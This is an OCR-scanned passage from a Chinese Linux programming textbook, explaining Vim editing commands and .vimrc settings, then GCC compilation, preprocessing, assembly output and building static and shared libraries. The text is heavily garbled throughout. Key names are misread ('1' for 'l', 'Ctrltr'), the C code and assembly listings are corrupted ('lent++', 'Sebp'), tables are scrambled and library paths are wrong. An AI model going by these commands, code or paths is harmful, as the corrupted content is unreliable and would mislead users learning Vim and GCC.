Vim 会 直接 退出 ， 不 保存 所 作 修改 。q! 是 强制 退出 的 意思 。 

Vim 有 一 个 学 习 的 帮助 工具 一 一 vimtutor, 它 是 很 有 帮助 的 一 个 工具 , 初学 者 可 以 使 用 
它 进行 Vim 的 练习 。 输 入 “vimtutor” 后 ， 可 以 按照 它 的 指示 由 浅 入 深 地 进行 学 习 。 


2.1.3 使 用 Vim 编辑 文本 


Vim 的 编辑 命令 有 很 多 ， 本 节 将 选取 经 常 使 用 的 儿 个 命令 进行 介绍 。 介 绍 如 何在 Vim 
下 移动 光标 ， 进 行 删 除 字符 、 复 制 、 查 找 、 转 跳 等 操作 。 


1. 移动 光标 h、j、k、! 


Vim 在 普通 模式 下 移动 光标 需要 按 特定 的 键 ， 进 行 左 、 下 、 上 、 右 光标 移动 操作 的 字 
符 分 别 为 h、j、k、1 这 4 个 字符 ， 其 含义 如 下 : 


计 F 才 作 
1 一 1 


广元 


按 h 键 ， 光 标 左 移 一 个 字符 的 位 置 ; 按 1 键 ， 光 标 右 移 一 个 字符 的 位 置 ; 按 k 键 ; 光 
标 上 移 一 行 ， 按 j 键 ， 光 标 下 移 一 行 。 

当然 还 可 以 用 方向 键 移动 光标 ， 但 必须 将 手 从 字母 键 位 置 上 移动 到 方向 键 上 ， 这 样 会 
减 慢 输入 速度 。 而 且 ， 有 一 些 键盘 是 没有 方向 键 的 ， 或 者 需要 特殊 的 操作 才能 使 用 方向 键 
(例如 必须 按 组 合 键 )。 所 以 ， 知 道 用 h、j、k、1 字 符 移动 光标 的 用 法 是 很 有 帮助 的 。 
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2. 删除 字符 x、dd、u、Ctrl+R 


要 删除 一 个 字符 可 以 使 用 x， 在 普通 模式 下 ， 将 光标 移 到 需要 删除 的 字符 上 面 然后 按 
x 键 。 例 如 hello.c 的 第 一 行 输入 有 一 个 错误 : 


#Include <stdio.h> 


将 光标 移动 到 IT 上， 然后 按 x 键 ， 切 换 输入 模式 到 插入 模式 ， 输 入 i， 对 include 的 修 
正 完成 了 。 

要 删除 一 整 行 可 以 使 用 dd 命令 ， 删 除 一 行 后 ， 它 后 面 的 一 行内 容 会 自动 向 上 移动 一 
行 。 使 用 这 个 命令 的 时 候 要 注意 输入 d 的 个 数 ， 两 个 d 才 是 一 个 命令 ， 在 实际 使 用 过 程 中 
经 常 将 d 的 输入 个 数 弄 混淆 。 

恢复 删除 可 以 使 用 u。 当 删除 了 不 应 该 删除 的 东西 后 ，u 命令 可 以 取消 之 前 的 删除 。 
例如 ， 用 dd 命令 删除 一 行 ， 再 按 u 键 ， 恢 复 被 删除 的 该 行 字符 。 

Ctrltr 是 一 个 特殊 的 命令 ， 它 为 取消 一 个 命令 ， 可 以 使 用 它 对 u 命令 造成 的 后 果 进 行 
弥补 。 例 如 使 用 u 命令 撤销 了 之 前 的 输入 ， 重 新 输入 字符 是 很 麻烦 的 ， 而 使 用 Ctrltr 可 以 
十 分 方便 地 将 之 前 使 用 u 命令 撤销 输入 的 字符 重新 找 回 。 

3. 复制 粘贴 p、y 

Vim 下 的 粘贴 命令 是 字符 p， 它 的 作用 是 将 内 存 中 的 字符 复制 到 当前 光标 的 后 面 。 使 
用 p 时 的 前 提 是 内 存 中 有 合适 的 字符 串 复制 ， 例 如 要 将 一 行 复制 到 某 个 地 方 ， 可 以 用 dd 
命令 删除 它 ， 然 后 使 用 u 命令 恢复 ， 这 时 候 内 存 中 是 dd 命令 删除 的 字符 串 。 将 光标 移动 到 
需要 插入 的 行 之 前 ， 使 用 p 命令 可 以 把 内 存 中 的 字符 串 复制 后 放置 在 选 定 的 位 置 。 

y 命令 ( 即 yank) 是 复制 命令 , 将 指定 的 字符 串 复制 到 内 存 中 , yw 命令 ( 即 yank words) 
用 于 复制 单词 ， 可 以 指定 复制 的 单词 数量 ，y2w 复制 两 个 单词 。 例 如 下 一 行 代 码 : 

1 #include <stdio.h> 

光标 位 于 此 行 的 头 部 ， 当 输入 y2w 时 字符 串 ##knclude 就 复制 到 内 存 中 ， 按 p 键 后 ， 此 
行 如 下 : 


1 ##include include <stdio.h> 


全 注意 : 命令 y 在 进行 字符 串 复制 的 时 候 包 含 末尾 的 空格 。 按 行进 行 字符 串 的 复制 时 ， 使 
用 dd 命令 复制 的 方式 比较 麻烦 ， 可 以 使 用 yy 命令 进行 复制 。 
4. 查找 字符 串 “/” 
查找 字符 串 的 命令 是 “/xxx”， 其 中 的 xxx 代表 要 查找 的 字符 串 。 例 如 查找 当前 文件 的 
printf 字符 串 ， 可 以 输入 以 下 命令 进行 查找 : 
ed a 
按 Enter 键 后 ， 如 果 找 到 匹配 的 字符 串 ， 光 标 就 停 在 第 一 个 合适 的 字符 串 光 标 上 。 查 


找 其 他 的 匹配 字符 串 可 以 输入 字符 “n” 向 下 移 到 一 个 匹配 的 字符 串 上 ， 输 入 字符 “N” 则 
会 向 上 移 到 一 个 匹配 的 字符 串 上 。 
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5. 跳 到 某 一 行 9 

在 编写 程序 或 者 修改 程序 的 过 程 中 ， 经 常 需要 转 跳 到 某 一 行 〈 这 在 编译 程序 出 错 ， 进 
行 修改 程序 的 时 候 是 经 常 遇 到 的 , 因为 GCC 编译 器 的 报错 信息 会 提示 某 行 出 错 )。 命 令 “:n” 
可 以 让 光标 转 到 某 一 行 , 其 中 n 代表 要 转 跳 到 的 行 数 。 例 如 要 跳 到 第 5 行 , 可 以 输入 “:5”， 
然后 按 Enter 键 ， 光 标 会 跳 到 第 5 行 的 头 部 。 还 有 一 种 实现 方式 ， 即 nG，n 为 要 转 跳 的 行 
数 ，5G 是 转 跳 到 第 5 行 的 命令 ， 注 意 其 中 的 G 为 大 写 。 


2.1.4 Vim 的 格式 设置 

Vim 下 可 以 进行 很 多 方式 的 格式 设置 ， 这 里 仅 对 经 常 使 用 的 格式 进行 介绍 ， 例 如 设置 
缩 进 ， 设 置 Tab 键 对 应 空格 的 长 度 ， 设 置 行 号 等 。 

1. 设置 缩 进 

合理 的 缩 进 会 使 程序 更 加 清晰 ，Vim 提供 了 多 种 方法 来 简化 这 项 工作 。 要 对 C 语言 程 
序 缩 进 , 需要 设 定 cindent 选项 ; 如 果 需 要 设置 下 一 行 的 缩 进 长 度 可 以 设置 shiftwidth 选项 。 
例如 如 下 命令 实现 4 个 空格 的 缩 进 。 

:set cindent shiftwidth=4 

设 定 了 这 一 选项 之 后 , 当 输 入 一 行 语句 后 , Vim 会 自动 在 下 一 行进 行 缩 进 。 例 如 在 这 x) 
一 行 代码 后 面 的 内 容 ， 行 的 开头 会 自动 向 下 一 级 缩 进 。 例 如 : 


2 ES 引 

自动 缩 进 ---> do equal (); 
自动 取消 缩 进 <-- ES 
自动 缩 进 ---> do TE(N 
自动 取消 缩 进 <-- } 


自动 缩 进 还 能 提前 发 现代 码 中 的 错误 。 例如 当 输 入 了 一 个 “}” 后 ， 如 果 发 现 比 预想 中 
的 缩 进 多 ， 那 可 能 缺少 了 一 个 “}”。 用 % 命 令 可 以 查找 与 “}” 相 匹配 的 “{”。 


2. 设置 Tab 键 的 空格 数量 
进行 文本 编辑 的 时 候 Tab 键 可 以 移动 一 块 较 大 的 距离 ， 不 同 的 文本 编辑 器 对 Tab 键 移 
动 距离 的 解释 是 不 同 的 。Vim 编辑 器 Tab 键 的 默认 移动 距离 为 8 个 空格 ， 当 需要 对 这 个 值 
进行 更 改 的 时 候 ， 需 要 设置 tabstop 选项 的 值 。 命 令 “:set tabstop=n” 可 以 设置 Tab 键 对 应 
空格 的 数量 ， 例 如 “:set tabstop=2” 将 Tab 键 的 宽度 设置 为 2 个 空格 。 

3. 设置 行 号 

在 程序 中 设置 行 号 使 程序 更 加 一 日 了 然 , 设置 行 号 的 命令 是 “:set number”， 按 下 Enter 
键 后 程序 每 行 代码 的 头 部 会 有 一 个 行 号 的 数值 。 
2.1.5 Vim 配置 文件 .vimrc 


Vim 启动 的 时 候 会 根据 ~/.vimrc 文件 配置 vi 的 设置 , 可 以 修改 文件 .vimrc 来 定制 Vim。 
例如 可 以 使 用 shiftwidth 设置 缩 进 宽度 、 使 用 tabstop 设置 Tab 键 的 宽度 、 使 用 number 设置 
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行 号 等 格式 来 定义 Vim 的 使 用 环境 。 例 如 按照 如 下 的 情况 对 .vimre 文件 进行 修改 : 


set shiftwidth=2 # 设 置 缩 进 宽 度 为 2 个 空格 
set tabstop=2 # 设 置 Tab 键 宽度 为 2 个 空格 
set number # 显 示 行 号 


再 次 启动 Vim， 对 缩 进 宽度 、Tab 键 的 宽度 都 进行 了 设 定 ， 并 且 会 自动 显示 行 号 。 
2.1.6 使 用 其 他 编辑 器 


在 Linux 下 还 有 一 些 其 他 的 编辑 器 ， 例 如 Gvim (Gvim 是 Vim 的 GNOME 版 本 )、 
codeblocks〔 严 格 来 说 是 一 个 IDE 开发 环境 )。 

在 Linux 下 进行 开发 并 不 排斥 使 用 Windows 环境 下 的 编辑 器 , 例如 写字 板 、UltraEdit、 
VC 的 IDE 开发 环境 等 , 在 保存 的 时 候 要 注意 保存 为 UNIX 格式 , 这 主要 是 换行 符 造成 的 。 
在 Windows 下 的 换行 为 “ 回 车 + 换行 ” 而 UNIX 环境 下 的 换行 为 单个 的 换行 ,在 Linux 下 
j Vim 查看 会 发 现 每 行 的 末尾 有 一 个 很 奇怪 的 “一 ”。 如 果 没 有 保存 为 UNIX 格式 , 在 Linux 
下 可 以 用 dos2UNIX 转换 。 例 如 ,文件 hello.c 使 用 Windows 编辑 器 ， 默 认 保存 ， 将 其 转换 
为 UNIX 格式 : 


$dos2UNIX hello.c 


再 次 查看 文件 hello.c,“ 一 ”符号 已 经 消失 了 。 


2.2 Linux 下 的 GCC 编译 器 工具 集 


在 2.1 节 中 ， 介 绍 了 如 何 使 用 Linux 环境 下 的 编辑 器 编写 程序 ， 并 编写 了 一 个 hello.c 
的 程序 。 要 使 编写 的 程序 能 够 运行 ， 需 要 进行 程序 的 编译 。 本 节 将 介绍 Linux 环境 下 采用 
的 编译 器 GCC 的 选项 和 使 用 方式 。 


2.2.1 GCC 简介 


GCC 是 Linux 下 的 编译 工具 集 ， 是 GNU Compiler Collection 的 缩写 ， 包 含 gcc、g++ 
等 编译 器 。 这 个 工具 集 不 仅 包含 编译 器 ， 还 包含 其 他 工具 集 ， 例 如 ar、nm 等 。 

GCC 工具 集 不 仅 能 编译 C/C++ 语言 ， 其 他 例如 Objective-C、Pascal、Fortran 、Java、 
Ada 等 语言 均 能 进行 编译 。 GCC 在 可 以 根据 不 同 的 硬件 平台 进行 编译 , 即 能 进行 交叉 编译 ， 
在 A 平 台 上 编译 B 平 台 的 程序 ,支持 常见 的 X86、ARM、PowerPC、mips 等 ， 以 及 Linux、 
Windows 等 软件 平台 。 在 本 书 中 仅 介 绍 对 C 语言 进行 编译 ， 其 他 语言 的 编译 请 读者 查阅 相 

GCC 在 各 种 平台 下 都 被 广泛 地 采用 , 特别 是 嵌入 式 平台 下 ,这 得 益 于 它 的 目标 机 定义 
规则 。 当 对 目标 机 的 硬件 进行 了 合适 的 定义 后 , 可 以 生成 目标 机 能 够 正确 解析 的 文件 格式 。 
另外 ，GCC 的 强大 前 端 是 定义 新 语言 的 好 方法 ， 例 如 可 以 重新 定义 语法 解析 规则 ， 定 义 自 
己 使 用 的 专 有 编程 语言 。 查 看 www.gnu.org 上 关于 GCC 介绍 的 gcc internel 可 以 得 到 更 多 
更 详细 的 信息 。 

GCC 的 C 编译 器 是 gcc， 其 命令 格式 为 : 
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Usage: gcc [options] file... 
GCC 支持 默认 扩展 名 策略 ， 表 2.1 是 GCC 下 默认 文件 扩展 名 的 含义 。 
表 2.1 文件 扩展 名 含义 


文件 扩展 名 GCC 所 理解 的 含义 


*.C 该 类 文件 为 C 语 5 
*.h 该 类 文件 为 C 语言 的 头 文件 
+ 一 一 一 一 村 


语言 的 


该 类 文件 为 C++ 
该 类 文件 为 C++ 语言 


*.CXX 该 类 文件 为 C++ 语言 了 

*.m 该 类 文件 为 Objective-C 语言 的 源 文件 
中 .S 该 类 文件 为 汇编 语言 的 源 文件 

本.0 该 类 文件 为 汇编 后 的 目标 文件 


该 类 文件 为 静态 库 
该 类 文件 为 共享 库 
该 类 文件 为 链接 后 的 输出 文件 


GCC 下 有 很 多 编译 器 ， 可 以 支持 C 语言 、C++ 语 言 等 多 种 语言 ， 表 2.2 是 常用 的 几 个 
编译 器 。 


表 2.2 GCC 编译 器 含义 


GCC 编译 器 命令 


TFT | 指 的 是 C 语言 编 


指 的 是 预 处 理 编译 器 “| ”gH+ | 指 的 是 CH 语 Em 
进行 程序 编译 的 时 候 , 头 文件 路 径 和 库 文件 路 径 是 编译 器 默认 查找 的 地 方 ,参见 表 2.3。 
表 2.3 默认 路 径 


类 型 存放 路 径 
按照 先后 顺序 查找 如 下 目录 : 
i /usr/local/include 
头 文件 /usrlib/gcc/i686-Linux-gnu/4.6.3/include 
/usr/include 


按照 先后 顺序 查找 如 下 路 径 : 

/usrlib/gcc/i686-Linux-gnu/4.6.3/ 

/usrlib/gcc/i686-Linux-gnu/4.6.3/ 
/usr/lib/gcc/i686-Linux-gnu/4.6.3/../../../../1686-Linux-gnu/lib/i1686-Linux-gnu/4.6.3/ 
/usrlib/gcc/i686-Linux-gnu/4.6.3/ ../i686-Linux-gnu/lib/ 

库 文件 /usrlib/gcc/i686-Linux-gnu/4.6.3/ i686-Linux-gnu/4.6.3/ 
/usrlib/gcc/i686-Linux-gnu/4.6.3/../../.. 
/lib/i686-Linux-gnu/4.6.3/ 

/lib/ 

/usr/lib/i1686-Linux-gnu/4.6.3/ 

/usr/lib/ 


/ 


。20 。 


第 2 章 ”Linux 编程 环境 


2.2.2 ”编译 程序 的 基本 知识 


GCC 编译 器 对 程序 的 编译 如 图 2.1 所 示 ， 分 为 4 个 阶段 : 预 编译 、 编 译 和 优化 、 汇 编 
和 链接 。GCC 的 编译 器 可 以 将 这 4 个 步骤 合并 成 一 个 。 


编 
预 译 汇 链 
纺 ”| 和 ”| 编 | 接 
译 优 

化 


图 2.1 GCC 对 程序 的 编译 过 程 


源 文件 、 目 标 文件 和 可 执行 文件 是 编译 过 程 中 经 常用 到 的 名 词 。 源 文件 通常 指 存放 可 编 
辑 代 码 的 文件 ， 如 存放 C、C++ 和 汇编 语言 的 文件 。 目 标 文件 是 指 经 过 编译 器 的 编译 生成 的 
CPU 可 识别 的 三 进 制 代码 , 但 是 目标 文件 一 般 不 能 执行 , 因为 其 中 的 一 些 函数 过 程 没 有 相关 
的 指示 和 说 明 。 可 执行 文件 就 是 目标 文件 与 相关 的 库 链 接 后 的 文件 ， 它 是 可 以 执行 的 。 

预 编译 过 程 将 程序 中 引用 的 头 文件 包含 进 源 代 码 中 ， 并 对 一 些 宏 进行 替换 。 

编译 过 程 将 用 户 可 识别 的 语言 翻译 成 一 组 处 理 器 可 识别 的 操作 码 ， 生 成 目标 文件 ， 通 
常 翻译 成 汇编 语言 ， 而 汇编 语言 通常 和 机 器 操作 码 之 间 是 一 种 一 对 一 的 关系 。GNU 中 有 
C/C++ 编译 器 GCC 和 汇编 器 as。 

所 有 的 目标 文件 必须 用 某 种 方式 组 合 起 来 才能 运行 ， 这 就 是 链接 的 作用 。 目 标 文件 中 
通常 仅 解析 了 文件 内 部 的 变量 和 函数 ， 对 于 引用 的 函数 和 变量 还 没有 解析 ， 这 需要 将 其 他 
已 经 编写 好 的 目标 文件 引用 进来 ， 将 没有 解析 的 变量 和 函数 进行 解析 ， 通 常 引用 的 目标 是 
库 。 链 接 完成 后 会 生成 可 执行 文件 。 


2.2.3 ”单个 文件 编译 成 执行 文件 


在 Linux 下 使 用 GCC 编译 器 编译 单个 文件 十 分 简单 , 直接 使 用 gcc 命令 后 面 加 上 要 编 
译 的 C 语言 的 源 文件 ，GCC 会 自动 生成 文件 名 为 a.out 的 可 执行 文件 。 自 动 编译 的 过 程 包 
括 头 文件 扩展 、 目 标 文件 编译 ， 以 及 链接 默认 的 系统 库 生 成 可 执行 文件 ， 最 后 生成 系统 默 
认 的 可 执行 程序 aout。 

下 面 是 一 个 程序 的 源 代码 ， 代 码 的 作用 是 在 控制 台 输 出 “Hello World!” 字 符 串 。 


/*hello.c*/ 

#include <stdio.h> /* 头 文件 包含 #/ 

int main (void) 

{ 
printf ("Hello World!\n"); /* 打 印 "Hello World!"*/ 
return 0; 


} 

将 代码 存 入 hello.c 文件 中 ， 运 行 如 下 命令 将 代码 直接 编译 成 可 以 执行 文件 : 

$gcc hello.c 

在 2.2.1 节 中 列 出 了 GCC 编译 器 可 以 识别 的 默认 文件 扩展 名 , 通过 检查 hello.c 文件 的 
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扩展 名 ，GCC 知道 这 是 一 个 C 文件 。 

使 用 上 面 的 编译 命令 进行 编译 的 时 候 ，GCC 先进 行 扩展 名 判断 ， 选 择 编译 器 。 由 于 
hello.c 的 扩展 名 为 .c，GCC 认为 这 是 一 个 C 文件 ， 会 选择 gcc 编译 器 来 编译 hello.c 文件 。 

GCC 将 采取 默认 步骤 , 先 将 C 文件 编译 成 目标 文件 , 然后 将 目标 文件 链接 成 可 执行 文 
件 ， 最 后 删除 目标 文件 。 上 述 命令 没有 指定 生成 执行 文件 的 名 称 ，GCC 将 生成 默认 的 文件 
名 aout。 运 行 结 果 如 下 : 

SR (执行 a.out 可 执行 文件 ) 

Hello World! 

如 果 希 望 生成 指定 的 可 执行 文件 名 ， 选 项 -o 可 以 使 编译 程序 生成 指定 文件 名 ， 例 如 将 
上 述 程 序 编 译 输出 一 个 名 称 为 test 的 执行 程序 : 


$gcc -o test hello.c 


上 述 命令 把 hello.c pe 译 成 可 执行 文件 test。 运 行 可 执行 文件 test， 向 终端 输出 
“Hello World!” 字 符 串 。 运 行 结果 如 下 : 


$./test 
Hello World! 


2.2.4 编译 生成 目标 文件 


目标 文件 是 指 经 过 编译 器 的 编译 生成 的 CPU 可 识别 的 二 进 制 代码 , 因为 其 中 一 些 函数 
过 程 没有 相关 的 指示 和 说 明 ， 目 标 文 件 不 能 执行 。 

在 2.2.3 节 中 介绍 了 直接 生成 可 执行 文件 的 编译 方法 ， 在 这 种 编译 方法 中 ， 中 间 文 件 
作为 临时 文件 存在 ， 在 可 执行 文件 生成 后 ， 会 删除 中 间 文 件 。 在 很 多 情况 下 需要 生成 中 间 
的 目标 文件 ， 用 于 不 同 的 编译 目标 。 

GCC 的 -c 选项 用 于 生成 目标 文件 ,这 一 选项 将 源 文 件 生成 目标 文件 ， 而 不 是 生成 可 执 
行文 件 。 默 认 情 况 下 生成 的 目标 文件 的 文件 名 和 源 文 件 的 名 称 一 样 ， 只 是 扩展 名 为 .o。 例 
如 ， 下 面 的 命令 会 生成 一 个 名 字 为 hello.o 的 目标 文件 : 
$gcc -c hello.c 
如 果 需 要 生成 指定 的 文件 名 ， 可 以 使 用 -o 选项 。 下 面 的 命令 将 源 文件 hello.c 编译 成 目 
标 文件 ， 文 件 名 为 test.o: 
$gcc -c -o test.o hello.c 
可 以 用 一 条 命令 编译 多 个 源 文件 ， 生 成 目标 文件 ， 这 通常 用 于 编写 库 文件 或 者 一 个 项 


目 中 包含 多 个 源 文件 。 例 如 一 个 项 目 包 含 filel.c、file2.c 和 file3.c， 下 面 的 命令 可 以 将 源 文 
件 生成 3 个 目标 文件 :filel.o、file2.o 和 file3.o: 


$gcc -c filel.c file2.c file3.c 


2.2.5 多 文件 编译 
GCC 可 以 自动 编译 链接 多 个 文件 , 不 管 是 目标 文件 还 是 源 文件 ， 都 可 以 使 用 同一 个 命 
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令 编译 到 一 个 可 执行 文件 中 。 例 如 一 个 项 目 包 含 两 个 文件 ， 文 件 string.c 中 有 一 个 函数 
StrLen 用 于 计算 字符 串 的 长 度 ， 而 在 main.c 中 调用 这 个 函数 将 计算 的 结果 显示 出 来 。 

1. 源 文件 string.c 

文件 string.c 的 内 容 如 下 。 文 件 中 主要 包含 了 用 于 计算 字符 串 长 度 的 函数 StrLen()。 
StrLen() 函 数 的 作用 是 计算 字符 串 的 长 度 , 输入 参数 为 字符 串 的 指针 , 输出 数值 为 计算 字符 
串 长 度 的 计算 结果 。StrLen(0) 函 数 将 字符 串 中 的 字符 与 \0' 进 行 比较 并 进行 字符 长 度 计 数 ， 
获得 字符 串 的 长 度 。 


01 /*string.c*/ 


02 #define ENDSTRING '\0!' /* 定 义 字符 串 */ 

03 int StrLen (char *string) 

全 

05 int len = 0; 

06 

07 while (*string++ != ENDSTRING) /* 当 *string 的 值 为 '\0' 时 ,停止 计算 */ 
08 lent++; 

09 return len; /* 返 回 此 值 */ 

OO 


2. 源 文件 main.c 
在 文件 main.c 中 是 main() 函 数 的 代码 ， 如 下 代码 所 示 。main() 函 数 调用 Strlen0) 函 数 计 
算 字 符 串 Hello Dymatic 的 长 度 ， 并 将 字符 串 的 长 度 打 印 出 来 。 


01 /*main.c*/ 
02 #include <stdio.h> 


03 extern int StrLen(char* str); /* 声 明 Strlen 函数 */ 

04 int main(void) 

05 

06 char src[]="Hello Dymatic"; /* 字 符 串 */ 

07 printf ("string length is:%d\n",StrLen(src)); /* 计 算 src 的 长 度 , 将 
结果 打印 出 来 */ 

08 return 0; 

09 站 


3. 编译 运行 
下 面 的 命令 将 两 个 源 文件 中 的 程序 编译 成 一 个 执行 文件 ， 文 件 名 为 test。 
$gcc -o test string.c main.c 


执行 编译 出 来 的 可 执行 文件 test， 程 序 的 运行 结果 如 下 : 

$./test 

String length is:13 

当然 可 以 先 将 源 文件 编 成 目标 文件 ， 然 后 进行 链接 。 例 如 ， 下 面 的 过 程 先 将 string.c 
和 main.c 源 文件 编译 成 目标 文件 string.o 和 main.o, 然后 将 string.o 和 main.o 链接 生成 test: 


$gcc -c string.c main.c 
$gcc -o test string.o main.o 
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2.2.6 ” 预 处 理 


在 C 语言 程 序 中 ,， 道 常 需要 包含 头 文件 并 会 定义 一 些 宏 。 预 处 理 过程 将 源 文件 中 的 头 
文件 包含 进 源 文件 中 ， 并 且 将 文件 中 定义 的 宏 进行 扩展 。 

编译 程序 时 选项 -E 告诉 编译 器 进行 预 编译 操作 。 例 如 如 下 命令 将 文件 string.c 的 预 处 
理 结 果 显 示 在 计算 机 屏幕 上 : 


$gcc -E string.c 


如 果 需 要 指定 源 文件 预 编 译 后 生成 的 中 间 结 果 文 件 名 ， 需 要 使 用 选项 -o。 例 如 ， 下 面 
的 代码 将 文件 string.c 进行 预 编 译 ， 生 成 文件 string.i。string.i 内 容 如 下 : 


$gcc -o string.i -E string.c 
ee 

# 1 "<built-in>" 

# 1 "< 命令 行 >" 
# 1 


stringse" 


int StrLen (char *string) 


{ 


int len = 0; 


while(*string++ != '\0') 
lent++; 
return len; 


| 

可 以 发 现 之 前 定义 的 宏 ENDSTRING， 已 经 被 奉 换 成 了 “\0”。 
2.2.7 ”编译 成 汇编 语言 

编译 过 程 将 用 户 可 识别 的 语言 翻译 成 一 组 处 理 器 可 识别 的 操作 码 ， 通 常 翻译 成 汇编 语 
言 。 汇 编 语 言 通常 和 机 器 操作 码 之 间 是 一 对 一 的 关系 。 

生成 汇编 语言 的 GCC 选项 是 -S, 默认 情况 下 生成 的 文件 名 和 源 文件 一 致 , 扩展 名 为 .s。 
例如 ， 下 面 的 命令 将 C 语言 源 文件 string.c 编译 成 汇编 语言 ， 文 件 名 为 string.s。 

$gcc -S string.c 

下 面 是 编译 后 的 汇编 语言 文件 string.s 的 内 容 。 其 中 ,第 1 行内 容 是 C 语言 的 文件 名 ， 
第 3 行 和 第 4 行 是 文件 中 的 函数 描述 ,标签 StrLen 之 后 的 代码 用 于 实现 字符 串 长 度 的 计算 。 


01 ,£1ile vestring.C™" 

02 text 

03 .globl StrLen 

04 .type StrLen, @function 
05 StrLen: 

06 .LFBO: 

07 cfi startproc 

08 pushl Sebp 

09 .Cfi def cfa _ offset 8 
10 “cfiooffset 5 8 

二 和 movl Sesp, Sebp 

12 CEi def cfa register s 


。24。 
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二 subl $16, Sesp 

14 movl $0, -4(%ebp) 

正 s jmp .L2 

6. =L3: 

下 addl $1, -4(%ebp) 

LO 2 

19 movl 8 (Sebp), Seax 

20 movzbl (Seax), Seax 

21 testb 多 al， S$%al 

2 全 Setne Sal 

23 addl $1, 8(%ebp) 

24 testb Sal, %Sal 

Eb jne .L3 

26 movl -4(%ebp), Seax 
27 leave 

28 CEL LestoOre Ss 

29 Crti dof cfa 47 4 

30 ret 

Ei .Cfi endproc 

32 .LFEO: 

33 .Size StrLen, . -StILen 
34 .ident "GCC: (Ubuntu/Linaro 4.6.3-lubuntu5) 4.6.3" 
EE .Section .note.GNU-stack, "", @progbits 


2.2.8 生成 和 使 用 静态 链接 库 


静态 库 是 obj 文件 的 一 个 集合 ， 通 常 静 态 库 以 “.a” 为 后 级 。 静 态 库 由 程序 ar 生成 ， 
现在 静态 库 已 经 不 像 之 前 那么 普遍 了 ， 这 主要 是 由 于 程序 都 在 使 用 动态 库 。 

静态 库 的 优点 是 可 以 在 不 用 重新 编译 程序 库 代 码 的 情况 下 ， 进 行程 序 的 重新 链接 ， 这 
种 方法 节省 了 编译 过 程 的 时 间 (在 编译 大 型 程序 的 时 候 , 需要 花费 很 长 时 间 )。 但 是 由 于 现 
在 系统 的 强大 ， 编 译 的 时 间 已 经 不 是 问题 。 静 态 库 的 另 一 个 优势 是 开发 者 可 以 提供 库 文件 
给 使 用 的 人 员 ， 不 用 开放 源 代码 ， 这 是 库 函数 提供 者 经 常 采用 的 手段 。 当 然 这 也 是 程序 模 
块 化 开发 的 一 种 手段 ， 使 每 个 软件 开发 人 员 的 精力 集中 在 自己 的 部 分 。 在 理论 上 ， 静 态 库 
的 执行 速度 比 共享 库 和 动态 库 要 快 (1% 一 5% )。 

1. 生成 静态 链接 库 

生成 静态 库 ， 或 者 将 一 个 obj 文件 加 到 已 经 存在 的 静态 库 的 命令 为 “ar 库 文件 obj 文 
件 1 obj 文件 2”。 创建 静 态 库 的 最 基本 步 又 是 生成 目标 文件 ， 这 点 前 面 已 经 介绍 过 。 然 后 


使 用 工具 ar 对 目标 文件 进行 归档 。 工 具 ar 的 -r 选项 ,可 以 创建 库 ， 并 把 目标 文件 插入 到 指 
定 库 中 。 例 如 ， 将 string.o 打包 为 库 文 件 libstra 的 命令 为 : 


$ar -rcs libstr.a string.o 


2. 使 用 静态 链接 库 


在 编译 程序 的 时 候 经 常 需 要 使 用 函数 库 , 例如 经 常 使 用 的 C 标准 库 等 。GCC 链接 时 使 
库 函数 和 一 般 的 obj 文件 的 形式 是 一 致 的 ， 例 如 对 main.c 进行 链接 的 时 候 ， 需 要 使 用 之 
前 已 经 编译 好 的 静态 链接 库 libstr.a， 命 令 格式 如 下 : 


$gcc -oO test main.c libstr.a 


oy 


eee) 
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也 可 以 使 用 命令 “-l 库 名 ”进行 ， 库 名 是 不 包含 函数 库 和 扩展 名 的 字符 串 。 例 如 编译 
main.c 链接 静态 库 libstr.a 的 命令 可 以 修改 为 : 


$gcc -o test main.c -lstr 


上 面 的 命令 将 在 系统 默认 的 路 径 下 查找 str 函数 库 ， 并 把 它 链接 到 要 生成 的 目标 程序 
上 。 可 能 系统 会 提示 无 法 找到 库 文件 str， 这 是 由 于 str 库 函 数 没 有 在 系统 默认 的 查找 路 径 
下 ， 需 要 显示 指定 库 函 数 的 路 径 ， 例 如 库 文件 和 当前 编译 文件 在 同一 目录 下 : 


$gcc -oO test main.c - 工 ./ -lstr 


全 注意 : 在 使 用 -1 选项 时 ，-o 选项 的 目的 名 称 要 在 -1 链接 的 库 名 称 之 前 ， 否 则 gcc 会 认为 
-| 是 生成 的 目标 而 出 错 。 


2.2.9 生成 动态 链接 库 


动态 链接 库 是 程序 运行 时 加 载 的 库 ， 当 动态 链接 库 正 确 安装 后 ， 所 有 的 程序 都 可 以 使 
用 动态 库 来 运行 程序 。 动 态 链接 库 是 目标 文件 的 集合 ， 目 标 文件 在 动态 链接 库 中 的 组 织 方 
式 是 按照 特殊 方式 形成 的 。 库 中 函数 和 变量 的 地 址 是 相对 地 址 ， 不 是 绝对 地 址 ， 其 真实 地 
址 在 调用 动态 库 的 程序 加 载 时 形成 。 

动态 链接 库 的 名 称 有 别名 (soname)、 真 名 (realname) 和 链接 名 (linker name )。 别 名 
由 一 个 前 级 lib, 然后 是 库 的 名 字 ， 再 加 上 一 个 后 级 “.so” 构 成 。 真 名 是 动态 链接 库 的 真实 
名 称 ， 一 般 总 是 在 别名 的 基础 上 加 上 一 个 小 版 本 号 、 发 布 版 本 等 构成 。 除 此 之 外 ， 还 有 一 
个 链接 名 ， 即 程序 链接 时 使 用 的 库 的 名 字 。 在 动态 链接 库 安 装 的 时 候 ， 总 是 复制 库 文件 到 
某 个 目录 下 ， 然 后 用 一 个 软 链接 生成 别名 ， 在 库 文件 进行 更 新 的 时 候 ， 仅 仅 更 新 软 链接 
即 可 。 


1. 生成 动态 链接 库 


生成 动态 链接 库 的 命令 很 简单 ， 使 用 -fPIC 选项 或 者 -fpic 选项 。-fPIC 和 -fpic 选项 的 作 
是 使 得 gcc 生成 的 代码 是 位 置 无 关 的 ， 例 如 下 面 的 命令 将 string.c 编译 生成 动态 链接 库 : 


$gcc -shared -Wl1,-soname,libstr.so -oO libstr.so.l1 string.c 


其 中 ， 选 项 “-soname,libstrso” 表 示 生 成 动态 库 时 的 别名 是 libstr.so; “-o libstr.so.1” 
选项 则 表示 是 生成 名 字 为 libstr.so.1 的 实际 动态 链接 库 文件 ，-shared 告诉 编译 器 生成 一 个 
动态 链接 库 。 

生成 动态 链接 库 之 后 一 个 很 重要 的 问题 就 是 安装 ， 一 般 情 况 下 将 生成 的 动态 链接 库 复 
制 到 系统 默认 的 动态 链接 库 的 搜索 路 径 下 ， 通 常 有 /lib、/msrlib、/usrlocalib， 放 到 以 上 任 
何 一 个 目录 下 都 可 以 。 


